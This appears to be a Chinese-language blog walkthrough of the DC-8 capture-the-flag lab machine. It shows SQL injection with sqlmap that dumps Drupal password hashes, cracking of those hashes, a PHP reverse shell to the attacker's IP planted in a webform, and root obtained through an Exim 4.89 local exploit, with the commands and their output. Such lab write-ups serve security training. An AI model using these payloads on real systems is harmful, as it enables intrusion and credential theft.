多喝热水:http://hackergu.com/
一、主机发现
使用netdiscover
,发现主机IP为192.168.203.134
。
二、端口扫描
root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.134
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.134
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.134:80/node/3
| Form id: webform-client-form-3
|_ Form action: /node/3
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /CHANGELOG.txt: Drupal v1
| /: Drupal version 7
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-server-header: Apache
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:05:ED:41 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.203.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.44 seconds
目标开放22端口和80端口,web站点是一个Drupal
CMS的站点,版本为7。
三、漏洞利用
我们访问此站点:
关注点为两个红框,如果点击上面那个红框的内容,url显示为:
http://192.168.203.134/node/2
倘若点击的是下面的红框,则url显示为:
http://192.168.203.134/?nid=2
看到这样的,话不多说,直接测试:
果然存在SQL注入,接下来换上sqlamp。
sqlmap -u http://192.168.203.134/?nid=2 --dbs
----------------------------------------------------------------------------
[22:49:32] [INFO] used SQL query returns 2 entries
[22:49:32] [INFO] retrieved: 'd7db'
[22:49:32] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] d7db
[*] information_schema
sqlmap -u http://192.168.203.134/?nid=2 -D d7db --tables
----------------------------------------------------------------------------
Database: d7db
[88 tables]
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users --columns
----------------------------------------------------------------------------
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| language | varchar(12) |
| access | int(11) |
| created | int(11) |
| data | longblob |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| name | varchar(60) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| status | tinyint(4) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users -C name,pass --dump
----------------------------------------------------------------------------
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+
两个账号手到擒来~~
接下来使用john
,对密码进行破解。
只解出来john用户的密码为turtle,登陆后台。
四、获取shell
根据DC-7中学到的思路,我们可以添加basic page
但是,好像因为john权限不够,无法写入php文件。
那就再重新寻找别的出口。
最终在webform
中找到了突破点:
添加:
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.203.129/7777 0>&1' ");
?>
然后保存。
那我们该怎么触发呢?发送一封邮件!
点击submit之后,便拿到了shell。
五、提权
利用命令查找suid权限的程序:
find / -user root -perm -4000 -print 2>/dev/null
看到了一个exim4
:
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。
可以看到确实有很多的漏洞,我们使用命令查看exim的版本号exim- bV
:
版本为4.89。
再去searchsploit里看一下:
这里确实存在一个版本号符合且是本地提权的脚本。
两种使用方法:
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
----------------------------------------------------------------
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
接下来开启web服务,将脚本下载到目标机器的/tmp
目录下,并chmod +x 46996.sh
赋权,运行:
我们使用netcat方法,但一直报错:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-30c6oXFS-1581910381638)(http://hackergu.com/wp-content/uploads/2020/02/eb80c7e3356d648.png)]
bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory
去网上找了找原因,win下编写的脚本无法在linux上使用。
我们需要使用命令,将文件转化为unix格式:
root@kali:~# dos2unix 46996.sh
dos2unix: 正在转换文件 46996.sh 为Unix格式...
解决完这个问题就OK了,拿到flag!
www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 17 Feb 2020 12:51:15 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1j3WV9-0000MX-2j
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# whoami
whoami
whoami
root
root@dc-8:/var/spool/exim4# cd /root
cd /root
cd /root
root@dc-8:/root# ls
ls
ls
flag.txt
root@dc-8:/root# cat flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.